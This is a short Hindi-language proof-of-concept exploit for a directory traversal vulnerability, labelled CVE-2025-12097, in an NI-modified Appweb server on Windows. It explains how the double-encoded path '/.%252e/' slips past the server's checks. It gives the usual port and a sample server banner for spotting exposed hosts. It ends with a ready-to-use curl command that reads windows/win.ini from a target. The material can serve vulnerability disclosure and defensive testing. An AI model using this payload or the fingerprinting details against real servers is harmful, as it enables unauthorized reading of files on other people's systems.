
CVE-2025-12097 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो NI-संशोधित Appweb सर्वर में एक डायरेक्टरी ट्रैवर्सल भेद्यता है, जो Windows सिस्टम पर मनमानी फ़ाइल पढ़ने की अनुमति देती है।
Appweb सर्वर का NI संशोधन एक डायरेक्टरी ट्रैवर्सल भेद्यता (directory traversal vulnerability) रखता है जो एक हमलावर को सर्वर पर मनमानी फाइलें पढ़ने की अनुमति देता है।
URI पथ /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini निम्न में परिवर्तित हो जाएगा:
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 जो एक वैध URI है और appweb इस अनुरोध को ब्लॉक नहीं करता है। इसे फिर कस्टम हैंडलर को पारित किया जाता है जो इस मामले में किसी भी अनुरोधित फाइल की सामग्री लौटाता है।
प्रभावित सॉफ्टवेयर की प्रकृति के कारण, प्रभावित डिवाइस केवल Microsoft Windows सिस्टम हैं।
देखा गया सबसे अधिक भेद्य संस्करण: 12.0.0.
प्रभावित डिवाइसों की पहचान निम्नलिखित विशेषताओं द्वारा की जा सकती है:
हमेशा मौजूद नहीं होता, लेकिन अधिकांश मामलों में सेवा पोर्ट 3580 पर चलती है, अन्य पोर्ट में 8080 और 80 शामिल हो सकते हैं।
/ के लिए सर्वर प्रतिक्रिया
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
इस भेद्यता का शोषण करने के लिए, आप निम्नलिखित कमांड का उपयोग कर सकते हैं:
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
यदि लक्ष्य भेद्य है तो आपको win.ini फाइल की सामग्री दिखाई देगी।